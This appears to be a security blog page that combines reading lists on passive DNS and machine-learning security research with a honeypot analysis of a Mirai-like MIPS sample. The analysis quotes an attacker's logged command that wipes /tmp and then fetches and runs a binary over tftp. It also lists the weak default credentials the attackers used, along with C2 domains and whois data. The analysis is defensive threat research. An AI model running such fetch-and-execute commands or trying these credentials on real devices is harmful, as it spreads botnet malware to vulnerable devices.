A short listing of research papers I’ve read or plan to read that use passive DNS (PDNS) data and graph analytics for identifying malicious domains.

Host-Domain Graphs

Host domain graphs are bipartite graphs mapping hosts/IPs to domains that they either resolved (passive DNS) or visited (web proxy logs). These graphs are used heavily in operational security machine learning papers on network threat hunting as they provide insight into the behavioral patterns across an enterprise or ISP.

Detecting Malicious Domains via Graph Inference P. K. Manadhata, S. Yadav, P. Rao, and W. Horne. In Proceedings of 19th European Symposium on Research in Computer Security, Wroclaw, Poland, September 7-11, 2014.

Detection of Early-Stage Enterprise Infection by Mining Large-Scale Log Data Alina Oprea, Zhou Li, Ting-Fang Yen, Sang H. Chin, and Sumyah Alrwais In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015.

Segugio: Efficient Behavior-Based Tracking of Malware-Control Domains in Large ISP Networks Babak Rahbarinia and Manos Antonakakis In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Domain Resolution Graphs (Domain-IP Graphs)

A domain resolution graph is an undirected bipartite graph representing observed domain->IP DNS resolution from Passive DNS data.

Notos: Building a Dynamic Reputation System for DNS M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and N. Feamster. In the Proceedings of the 19th USENIX Security Symposium, Washington, DC, USA, August 11-13, 2010.

EXPOSURE: Finding Malicious Domains using Passive DNS Analysis L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. In Proceedings of the Network and Distributed System Security Symposium, San Diego, California, USA, February 2011.

Discovering Malicious Domains through Passive DNS Data Graph Analysis Issa Khalil, Ting Yu, and Bei Guan. In Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security (ASIA CCS ‘16), 2016.


The “short links” format was inspired by Oreilly’s Four Short Links series.

Beehive: Large-Scale Log Analysis for Detecting Suspicious Activity in Enterprise Networks Ting-Fang Yen, Alina Oprea, Kaan Onarlioglu, Todd Leetham, William Robertson, Ari Juels, and Engin Kirda In Proceedings of Annual Computer Security Applications Conference (ACSAC), 2013

An Epidemiological Study of Malware Encounters in a Large Enterprise Ting-Fang Yen, Victor Heorhiadi, Alina Oprea, Michael K. Reiter, and Ari Juels In Proceedings of ACM Conference on Computer and Communications Security (CCS), 2014

Detection of Early-Stage Enterprise Infection by Mining Large-Scale Log Data Alina Oprea, Zhou Li, Ting-Fang Yen, Sang H. Chin, and Sumyah Alrwais In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Segugio: Efficient Behavior-Based Tracking of Malware-Control Domains in Large ISP Networks Babak Rahbarinia and Manos Antonakakis In Proceedings of IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2015

Malicious Behavior Detection using Windows Audit Logs Konstantin Berlin, David Slater, Joshua Saxe In Proceedings of the 8th ACM Workshop on Artificial Intelligence and Security (AISec) 2015

Operational security log analytics for enterprise breach detection Zhou Li and Alina Oprea In Proceedings of the First IEEE Cybersecurity Development Conference (SecDev), 2016

Lens on the endpoint: Hunting for malicious software through endpoint data analysis. Ahmet Buyukkayhan, Alina Oprea, Zhou Li, and William Robertson. In Proceedings of Recent Advances in Intrusion Detection (RAID), 2017


PS …

This is the Definitive Security Data Science and Machine Learning Guide. It includes books, tutorials, presentations, blog posts, and research papers about solving security problems using data science.

Table of Contents

Machine Learning and Security Papers

Intrusion Detection Papers

Malware Papers

Data Collection Papers

Vulnerability Analysis/Reversing Papers

Anonymity/Privacy/OPSEC/Censorship Papers

Data Mining Papers

Cyber Crime Papers


Deep Learning and Security Papers

Deep Learning and Security Presentations

Security Data Science Blogs

Blogs that frequently cover topics on security data science, machine learning, etc. These are recommended for your RSS feed.

Security Data Science Blogposts / Tutorials

Security Data Science Projects

Open source projects and code applying data science/machine learning to security problems.

Security Data

Collection of Security and Network Data Resources.

Security Data Science Books

Security Data Science Presentations / Talks


Update (1/1/2017): I will not be updating this page and instead will make all updates to this page: The Definitive Security Data Science and Machine Learning Guide (see Deep Learning and Security Papers section).

This is another quick post. Over the past few months I started researching deep learning to determine if it may be useful for solving security problems. This post on The Unreasonable Effectiveness of Recurrent Neural Networks was what got me interested in this topic, and I highly recommend reading it in its entirety.

Throughout this research, I came across several security related academic and professional research papers on security topics that use Deep Learning as part of their research. What follows is a list of the papers/slides/videos that I found, and these may be useful to others. If you have others that you think should be added to this list, please ping me: @jason_trost.

Deep Learning Papers on Security

Deep Learning Presentations on Security

Security Machine Learning Resources:

General Deep Learning Resources:


In a previous post, I discussed some of my experiences with heralding, a credential grabbing honeypot. In this post, I will briefly analyze a sample I obtained from tftp’ing a sample based on heralding log entries. This sample appears to be targetted at MIPS based systems installs that use very weak default creds (root:5up, Admin:5up). There are a few devices that I could find that uses these creds. There are likely many more.

In my previous post I mentioned that I was not able to download a sample from the tftp commands. Well today, I was finally able to download one of the samples via tftp without it timing out.

# Command from Heralding log: tftp -l 7up -r 7up -g
$ tftp 
tftp> connect
tftp> get 7up
Received 45065 bytes in 6.4 seconds
$ md5sum 7up 
3f3863996071b4f32ca8f8e1bfe27a45  7up

According to 3 AVs on Virustotal, 3f3863996071b4f32ca8f8e1bfe27a45 is Mirai, BUT the IPs performing the telnet scans only attempted 2 username/password combinations (and the Mirai source code uses many more so this may be a new variant or something completely different).

$ grep -F 'tftp -l 7up -r 7up -g' heralding_activity.log | csvcut -c 4 | sort -u  > /tmp/7up-scanners
$ wc -l /tmp/7up-scanners 
     338 /tmp/7up-scanners
$ grep -F -f /tmp/7up-scanners heralding_activity.log | csvcut -c 9,10 | sort | uniq -c | sort -nr
    693 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system
    350 Admin,5up
    347 root,5up
      2 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system
      2 cd /var/tmp;cd /tmp;rm -f *;tftp -l 7up -r 7up -g;chmod a+x 7up;./7up,system

Here are the IPs observed trying to get my honeypot to download and execute this specific sample (via “tftp -l 7up -r 7up -g”).

Docker + qemu-mips

h/t to Andrew Morris for his post: Quick TR069 Botnet Writeup + Triage. I used his method to run this file using Docker and qemu-mips to get some network IOCs and it worked very well.

$ docker pull asmimproved/qemu-mips
Using default tag: latest
latest: Pulling from asmimproved/qemu-mips

fdd5d7827f33: Pull complete 
a3ed95caeb02: Pull complete 
04f80dca1be3: Pull complete 
ec0e3823cad3: Pull complete 
479203818acd: Pull complete 
535b517723bd: Pull complete 
244dc522b0d5: Pull complete 
50d7b54d9c62: Pull complete 
8d61a54cd693: Pull complete 
bf48617ae046: Pull complete 
Digest: sha256:e55d85503449307b7621c595d821a84bd14a7ba38a29c9c387b364f90fd33dae
Status: Downloaded newer image for asmimproved/qemu-mips:latest

$ docker run -it asmimproved/qemu-mips

root@46621b449dc5:/project# apt-get install -y tcpdump
root@46621b449dc5:/project# tcpdump -s0 -w packets.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

In another terminal, run this:

$ docker ps
CONTAINER ID        IMAGE                   COMMAND             CREATED                  STATUS              PORTS               NAMES
46621b449dc5        asmimproved/qemu-mips   "bash"              Less than a second ago   Up 5 seconds                            happy_wright
$ docker cp 7up 46621b449dc5:/tmp/
$ docker exec -it 46621b449dc5 /bin/bash

root@46621b449dc5:/project# cd /tmp
root@46621b449dc5:/tmp# qemu-mips chmod 755 7up
root@46621b449dc5:/tmp# qemu-mips ./7up
Socket Bind: Address already in use

Switch back to the tcpdump terminal, and kill it. Also, and this is very important, kill the “qemu-mips 7up” processes. The 7up sample immediately starts scanning port 23 at a high rate so you don’t want it running very long.

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C3756 packets captured
4076 packets received by filter
0 packets dropped by kernel

root@46621b449dc5:/project# tcpdump -r packets.pcap -vvvv -nnNN -tttt 'udp port 53'
reading from file packets.pcap, link-type EN10MB (Ethernet)
2016-12-20 15:04:11.691645 IP (tos 0x0, ttl 64, id 16082, offset 0, flags [DF], proto UDP (17), length 60) > [bad udp cksum 0xbc5c -> 0xd5ae!] 13078+ A? inandoutand.in. (32)
2016-12-20 15:04:13.705981 IP (tos 0x0, ttl 37, id 8572, offset 0, flags [none], proto UDP (17), length 76) > [udp sum ok] 13078 q: A? inandoutand.in. 1/0/0 inandoutand.in. [9m59s] A (48)
2016-12-20 15:04:16.701336 IP (tos 0x0, ttl 64, id 16149, offset 0, flags [DF], proto UDP (17), length 63) > [bad udp cksum 0xbc5f -> 0xb781!] 13078+ A? hrjlyymassqx.tech. (35)
2016-12-20 15:04:16.841608 IP (tos 0x0, ttl 37, id 2120, offset 0, flags [none], proto UDP (17), length 79) > [udp sum ok] 13078 q: A? hrjlyymassqx.tech. 1/0/0 hrjlyymassqx.tech. [59s] A (51)

As you can see from the pcap, we were able to extracted a couple of IOCs:

  • hrjlyymassqx[.]tech (94.156.128[.]73)
  • inandoutand[.]in (94.156.128[.]70)

whois hrjlyymassqx[.]tech

Privacy protected so kind of a dead end.

Domain ID: D40442546-CNIC
WHOIS Server: whois.namecheap.com
Referral URL:
Updated Date: 2016-12-14T17:02:14.0Z
Creation Date: 2016-12-09T17:01:50.0Z
Registry Expiry Date: 2017-12-09T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C101183632-CNIC
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code:
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
Admin ID: C101183623-CNIC
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code:
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
Tech ID: C101183621-CNIC
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code:
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
DNSSEC: unsigned
Billing ID: C101183627-CNIC
Billing Name: WhoisGuard Protected
Billing Organization: WhoisGuard, Inc.
Billing Street: P.O. Box 0823-03411
Billing City: Panama
Billing State/Province: Panama
Billing Postal Code:
Billing Country: PA
Billing Phone: +507.8365503
Billing Phone Ext:
Billing Fax: +51.17057182
Billing Fax Ext:
Billing Email: 4a75182b38b841e486e7e74993fb0bce.protect@whoisguard.com
>>> Last update of WHOIS database: 2016-12-20T15:24:39.0Z <<<

Whois inandoutand[.]in

Not privacy protected and linked with some Mirai activity (see below). Also of note is the Registrant City which is “fastflux”, kind of funny.

Domain ID:D414400000002809790-AFIN
Created On:15-Dec-2016 14:41:33 UTC
Last Updated On:15-Dec-2016 14:41:36 UTC
Expiration Date:15-Dec-2017 14:41:33 UTC
Sponsoring Registrar:Endurance Domains Technology Pvt. Ltd. (R173-AFIN)
Registrant ID:EDT_62956067
Registrant Name:Kravitz Dlinch
Registrant Organization:Dlinch Kravitz
Registrant Street1:119 upyour lane
Registrant Street2:
Registrant Street3:
Registrant City:fastflux
Registrant State/Province:depends
Registrant Postal Code:00000
Registrant Country:CG
Registrant Phone:+242.887293717
Registrant Phone Ext.:
Registrant FAX:+242.0000000000
Registrant FAX Ext.:
Registrant Email:dlinchkravitz@gmail.com
Admin ID:EDT_62956068
Admin Name:Kravitz Dlinch
Admin Organization:Dlinch Kravitz
Admin Street1:119 upyour lane
Admin Street2:
Admin Street3:
Admin City:fastflux
Admin State/Province:depends
Admin Postal Code:00000
Admin Country:CG
Admin Phone:+242.887293717
Admin Phone Ext.:
Admin FAX:+242.0000000000
Admin FAX Ext.:
Admin Email:dlinchkravitz@gmail.com
Tech ID:EDT_62956069
Tech Name:Kravitz Dlinch
Tech Organization:Dlinch Kravitz
Tech Street1:119 upyour lane
Tech Street2:
Tech Street3:
Tech City:fastflux
Tech State/Province:depends
Tech Postal Code:00000
Tech Country:CG
Tech Phone:+242.887293717
Tech Phone Ext.:
Tech FAX:+242.0000000000
Tech FAX Ext.:
Tech Email:dlinchkravitz@gmail.com
Name Server:ns3.cnmsn.com
Name Server:ns4.cnmsn.com
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:

Searching for the registrant email, dlinchkravitz[@]gmail[.]com, turns up these blog posts:

These domains were not on the pre-computed list of DGAs found on Mirai DGA Domains from GovCERT.ch and the .in domain uses a TLD not supported by this Mirai DGA algo. After some more searching I found that Mirai’s DGA has been updated (New Mirai DGA Seed 0x91 Brute Forced) and the “hrjlyymassqx” domain was in their list.

There is a lot more that could be done with analyzing this sample and these IOCs, but I am out of time. So, that’s it for now.